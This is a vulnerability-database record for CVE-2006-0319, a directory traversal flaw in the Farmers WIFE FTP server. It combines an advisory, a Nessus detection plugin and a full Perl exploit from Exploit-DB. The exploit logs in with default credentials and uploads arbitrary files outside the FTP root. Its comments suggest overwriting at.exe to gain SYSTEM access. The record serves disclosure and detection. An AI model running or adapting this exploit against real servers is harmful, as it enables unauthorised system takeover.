ID CVE-2006-0319 Type cve Reporter cve@mitre.org Modified 2017-07-20T01:29:00
Description
Directory traversal vulnerability in the FTP server (port 22003/tcp) in Farmers WIFE 4.4 SP1 allows remote attackers to create arbitrary files via ".." (dot dot) sequences in a (1) PUT, (2) SIZE, and possibly other commands.
{"osvdb": [{"lastseen": "2017-04-28T13:20:19", "bulletinFamily": "software", "cvelist": ["CVE-2006-0319"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.electronicfarm.com/products/wifeinfo.asp\n[Secunia Advisory ID:18508](https://secuniaresearch.flexerasoftware.com/advisories/18508/)\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0466.html\nGeneric Exploit URL: http://www.lort.dk/DSR-farmerswife44sp1.pl\n[CVE-2006-0319](https://vulners.com/cve/CVE-2006-0319)\nBugtraq ID: 16321\n", "modified": "2006-01-06T14:03:24", "published": "2006-01-06T14:03:24", "href": "https://vulners.com/osvdb/OSVDB:22496", "id": "OSVDB:22496", "type": "osvdb", "title": "Farmers WIFE FTP Traversal Arbitrary File Upload", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-01-31T14:11:19", "description": "Farmers WIFE 4.4 sp1 (FTP) Remote System Access Exploit. CVE-2006-0319. Remote exploit for windows platform", "published": "2006-01-14T00:00:00", "type": "exploitdb", "title": "Farmers WIFE 4.4 sp1 FTP Remote System Access Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0319"], "modified": "2006-01-14T00:00:00", "id": "EDB-ID:1417", "href": "https://www.exploit-db.com/exploits/1417/", "sourceData": "#!/usr/bin/perl\n# kokanin 20060106 // farmers wife server 4.4 sp1 allows us to \n# use ../../../ patterns as long as we stand in a folder where we have write access.\n# haha, that's what you get for implementing your own access control instead of relying on the underlying OS.\n# default port is 22003, default writable path is /guests.\n\n# 0day 0day, private, distribute and die bla bla bla\n# leet (translated) note from <anonymized>: you can log in as IEUser/mail@mail.com or anonymous/mail@mail.com\n# on _all_ farmers wife servers. This can't be disabled unless you turn off FTP access. The anonymous\n# login gives you guest access, which means write access to /guests, which means default remote 'root'\n# aka SYSTEM access. Ha ha ha, thanks anonymized, I missed that bit.\n\n\nif(!$ARGV[0]){ die \"Usage: ./thisscript.pl <ip> [user] [pass] [port] [path] [trojan.exe] [/path/to/target.exe] \\n\";}\n# as in: ./thisscript.pl 123.45.67.89 demo demo 22003 /writablepath /etc/hosts /owned.txt\n# by default we just put /etc/hosts in a file called owned.txt in the root of the drive - \n# nuke %SYSTEMROOT%\\system32\\at.exe and wait for windows to run it.\n\n# We can check for the %SYSTEMROOT% with the SIZE command to determine the proper\n# location for our trojan.\n\nuse Net::FTP;\nmy $target = $ARGV[0];\nmy $dotdot = \"../../../../../../../../../../../../../../\";\n# Here we set defaults (It's ugly, I know) that gives REMOTE REWT OMGOMG I MEAN SYSTEM\nif($ARGV[1]){ $user = $ARGV[1] } else { $user = \"IEUser\";}\nif($ARGV[2]){ $pass = $ARGV[2] } else { $pass = \"mail\\@mail.com\";}\nif($ARGV[3]){ $port = $ARGV[3] } else { $port = \"22003\";}\nif($ARGV[4]){ $writablepath = $ARGV[4] } else { $writablepath = \"/guests\";}\nif($ARGV[5]){ $trojan = $ARGV[5] } else { $trojan = \"/etc/hosts\";}\nif($ARGV[6]){ $destination = $ARGV[6] } else { $destination = \"owned.txt\";}\nprint \" target: $target \\n user: $user \\n pass: $pass \\n port: $port \\n writable path: $writablepath \\n trojan: $trojan \\n targetfile: $destination \\n\";\n\n# Open the command socket\nuse Net::FTP;\n$ftp = Net::FTP->new(\"$target\",\n Debug => 0,\n Port => \"$port\")\n\tor die \"Cannot connect: $@\";\n\t$ftp->login(\"$user\",\"$pass\")\n\tor die \"Cannot login \", $ftp->message;\n\t$ftp->cwd(\"$writablepath\")\n\t# this software is so shitty, it allows us to CWD to any folder and just pukes later if it's not there.\n\tor die \"Cannot go to writable dir \", $ftp->message;\n\t# leet %SYSTEMROOT% scan by determining where at.exe is using SIZE\n\tmy @systemroots = (\"PUNIX\",\"WINXP\",\"WINNT\",\"WIN2000\",\"WIN2K\",\"WINDOWS\",\"WINDOZE\");\n\tfor(@systemroots){\n\t\t$reply = $ftp->quot(\"SIZE \" . $dotdot . $_ . \"/system32/at.exe\");\n\t\tif($reply == 2) { print \" %SYSTEMROOT% is /$_\\n\";my $systemroot=$_; }\n\t\t}\n\t$ftp->binary;\n\t$ftp->put(\"$trojan\",\"$dotdot\".\"$destination\")\n\tand print \"file successfully uploaded, donate money to kokanin\\@gmail.com\\n\" or die \"Something messed up, file upload failed \", $ftp->message;\n$ftp->quit;\n\n# milw0rm.com [2006-01-14]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/1417/"}], "nessus": [{"lastseen": "2021-01-01T01:59:03", "description": "The remote host appears to be running Farmers WIFE, a commercial\nfacilities, scheduling, and asset management package targeted at the\nmedia industry. \n\nThe version of Farmers WIFE installed on the remote host includes an\nFTP server that reportedly is vulnerable to directory traversal\nattacks. A user can leverage this issue to read and write to files\noutside the ftp root. Note that the application runs with SYSTEM\nprivileges under Windows.", "edition": 24, "published": "2006-01-20T00:00:00", "title": "Farmers WIFE FTP Server Multiple Command Traversal Arbitrary File Creation", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0319"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "FARMERSWIFE_FTP_DIR_TRAVERSAL.NASL", "href": "https://www.tenable.com/plugins/nessus/20754", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(20754);\n script_version(\"1.21\");\n\n script_cve_id(\"CVE-2006-0319\");\n script_bugtraq_id(16321);\n\n script_name(english:\"Farmers WIFE FTP Server Multiple Command Traversal Arbitrary File Creation\");\n script_summary(english:\"Checks for directory traversal vulnerability in Farmers WIFE FTP server\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote ftp server is affected by a directory traversal flaw.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running Farmers WIFE, a commercial\nfacilities, scheduling, and asset management package targeted at the\nmedia industry. \n\nThe version of Farmers WIFE installed on the remote host includes an\nFTP server that reportedly is vulnerable to directory traversal\nattacks. A user can leverage this issue to read and write to files\noutside the ftp root. Note that the application runs with SYSTEM\nprivileges under Windows.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2006/Jan/471\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Farmers WIFE 4.4 SP3 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/01/20\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/01/06\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"FTP\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\", \"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 22003, \"Services/www\", 22002);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"ftp_func.inc\");\n\n\nftp_port = get_ftp_port(default: 22003);\nhttp_port = get_http_port(default:22002);\n\n# Get the initial page.\nres = http_get_cache(item:\"/\", port:http_port, exit_on_fail: 1);\n\n# There's a problem if the version appears to be less than 4.4 SP3.\nif (\n \"<title>Farmers WIFE Web</title>\" >< res &&\n egrep(pattern:\">Server Version: ([0-3]\\..+|4\\.([0-3].*|4( \\(sp[0-2]\\)))?) \", string:res)\n) {\n security_warning(ftp_port);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}]}
